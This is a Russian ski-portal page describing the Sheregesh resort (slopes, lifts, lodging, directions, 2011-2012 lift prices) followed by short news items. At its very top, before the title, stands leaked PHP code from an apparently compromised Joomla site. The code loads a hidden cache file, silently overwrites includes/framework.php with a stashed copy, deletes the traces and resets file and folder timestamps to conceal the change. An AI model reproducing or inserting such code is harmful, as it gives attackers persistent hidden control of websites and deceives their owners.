$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Шерегеш Горная шория | горнолыжки
Баннер

Шерегеш Горная шория

Описание

Посмотреть красивые фото

Обсудить на форуме...

[Нажмите для увеличения]

Шерегеш  Горная шория- Один из известнейших горнолыжных курортов России. Расположен в Горной Шории, Кемеровская обл. Основное место катания - гора Зелёная - характеризуется разнообразием трасс как для начинающих горнолыжников и сноубордистов, так и для продвинутых экстремалов и фрирайдеров. Обилие снега даёт возможность великолепного целинного катания в лесу по знаменитому "пухляку". Однако, не только экстремалы могут получать удовольствие от склонов. Разнообразие рельефа и количества трасс делает Шерегеш привлекательным для горнолыжников любого уровня: для начинающих есть великолепный длинный и пологий "стол" у подножия горы, для экспертов, любителей бугров, целины и крутых склонов.

Неподалеку есть посёлок Шерегеш в котором можно разместиться без особых проблем даже если предварительно небыли заказаны номера в гостиницах. Неподалёку от единственного супермаркета "Кукуруза" можно всегда найти стайку пенсионеров готовых сдать жильё. На сезон 2010г цены на жильё были в районе 450-600р с человека. Доставку до курорта тоже не сложно организовать. Автомобиль в этом же сезоне стоил 100р в один конец. Если группа большая то можно заказывать и газельку, что выйдет ещё бюджетней. Ну а пешком идти это не вариант, хотя на автомобиле и кажется что всё рядом,  однако во всей омуниции и со сноубордом за плечами это будет проблематично. Были экстремалы которые умудрялись обратно доехать на сноуборде, если есть желание сможете попробовать.

Сезон катания - с ноября по май. Ближайшие крупные населённые пункты: Новосибирск, Томск, Красноярск, Кемерово, Новокузнецк. Уникальный климат обеспечивает беспрецедентно длинный сезон катания - с ноября по май.

Из плюсов:
- Великолепные склоны
- Цены не кусаются
- Склоны на любой вкус
- Есть гондольный и кресельный подъёмник
- Недалеко есть посёлок, в котором вам рады предложить жильё на первой же остановке

Минусы:
- Далековато ехать

Перепад высот ~630м
Характеристики трасс:

Высота горы Зеленой  - 1270 метров, нижняя точка катания находится на высоте 600 м.
Самый снежный курорт Западной Сибири дарит радость целинного катания в лесу по «пухляку». Любителей внетрассового спуска ждут восточный и западный склон горы.
Верхняя часть склона разделяется на левый рукав (черно-красный), с относительно ровными участками и правый рукав черной трассы, одинаково крутой по длине всего спуска. Средняя крутизна склона составляет 32 градуса, местами увеличиваясь до 45.
Протяженность трасс колеблется от 700 метров до 4 км.
Пологий «стол» у подножия горы – место тренировок начинающих лыжников.
Склоны готовятся ратраками.

Общая протяженность: 23км

Характеристики подъемников:

На курорте 17 подъемников: 8 бугельных подъемников, 1 гондольно-кресельная канатная дорога, 3 парнокресельные канатные дороги, 2 гондольные канатные дороги.
Зона катания образована из четырех вершин — горы Мустаг, Зеленая, Курган и Утуя. Гора делится на 3 сектора — сектор A (компании Шория-Тур, Каскад), Южный сектор (Скайвей), сектор Е (Новая лига).
Большая часть подъемников сосредоточена в районе трасс «Шория-тур» и «Каскад».
Единого ски-пасса на все зоны катания нет.

Часы работы:

 

  • Среда – с 13.00 до 21.00
  • Пятница– с 13.00 до 19.00
  • Суббота, воскресенье, праздники – с 10.00 до 19.00


Удобства

  • Кафе;
  • Корпоративные и семейные праздники;
  • Гостиничный комплекс (Пансионат "Парк-Отель");

Инструкторы

Обучение катанию с инструктором.

Прокат/Ремонт инвентаря

Прокат, ремонт, продажа оборудования.



Как добираться

Шерегеш (гора Зеленая) располагается в 200 км от Новокузнецкого аэропорта.
От города Новокузнецка можно добраться поездом до станции Кондома (30 км до Шерегеша), а дальше - автобусом до Таштагола.
В течение горнолыжного сезона действует регулярное автобусное сообщение с поселком Шерегеш и туристической базой «Медвежонок».

Контактная информация

Кемеровская область, пос. Шерегеш.
Шория-Тур, тел. 8 (38473) 30-167,
Официальный сайт: www.shoria.ru

Обсудить на форуме...

Цены 2011-2012г.г.

Стоимость абонементов на канатные дороги комплекса.

Cезон 2011-2012

Канатная дорога Стоимость подъема

будни/вых

Сектор А, оператор "Каскад-Подъем"

Кресельная "Хлебница" ("Доллар")
100
Кресельная "Зеленая" (слева)
90
Кресельная "Синяя" (справа) 80
Нижний левый бугель 50
Верхний левый бугель 40
Нижний правый бугель 40
Верхний правый бугель 40
Ski-pass, 4 часа 650
Ski-pass, 1 день 1000
VIP Ski-pass, 1 день 4000
Ski-pass, 2 дня 1900
Ski-pass, 3 дня 2700

Сектор А, другие операторы

Малая кресельная "Спортотель" 50
Бугельная "Спортотель" н/д
Бугельная "Фристайл" 20/30
Ski-pass "Фристайл", 1 день
200/300

"Sky Way" + "Панорама", оператор "Malca"

Гондольно-кресельная "Панорама" 50/100
Гондольная "Sky Way" ("Рыжая") 50/120
Бугель «Sky Way» нижний 30
Бугель «Sky Way» верхний 30
Ski-pass "Malca", 4 часа 500
Ski-pass "Malca", 1 день 1000

Сектор Е, оператор "Шория-тур"

Гондольная "Сектор Е" 100/120*
Бугельная "Сектор Е" 40
Ski-pass, 1 день 800

Залоговая стоимость карты - 100 руб.

Прокат снаряжения в "Неваляшке" - от 200 руб./час за комплект.

Коментарии:

 
.

Последние новости

Популярные статьи

Новости
Открытие сезона на ГЛЦ "Царевщина"

Ну вот и дождались любители горных лыж и сноуборда открытия ГЛЦ "Царевщина". Сегодня был полноценный рабочий день на этом комплексе. Снегу накидали достаточно, земли нигде не видно. В некоторых местах есть лёд. Народу немного, на подъёмнике очередей нет. Цены остались на уровне прошлого сезона: 1 смена с 10 до 15 - 600р, 2 смена с 13 до 17 - 700р, 3 смена с 17 до 21 - 300р (в выходные дни). В будние дни соответственно 250 - 300 - 200руб. Работает как всегда только центральная трасса.

 
Новости ГЛК Красная глинка

По заявлениям представителей ГЛК  Красная Глинка, что неподалёку от Самары, открытие намечено не 2 декабря, в настоящее время активно идёт подготовка склонов. На Юге убрали не работающий подъемник, трасса стала шире. Сейчас снежат Восточный склон. К открытию скорее всего будут работать Центр, Восток и если успеют то и Юг.

 
Появился новый раздел "Народный магазин"
Подробнее ...
Шерегеш Горная шория | горнолыжки

Как доехать на машине
*От:
*До:
Дай +1 :)
Сохранить в моб...
Яндекс.Метрика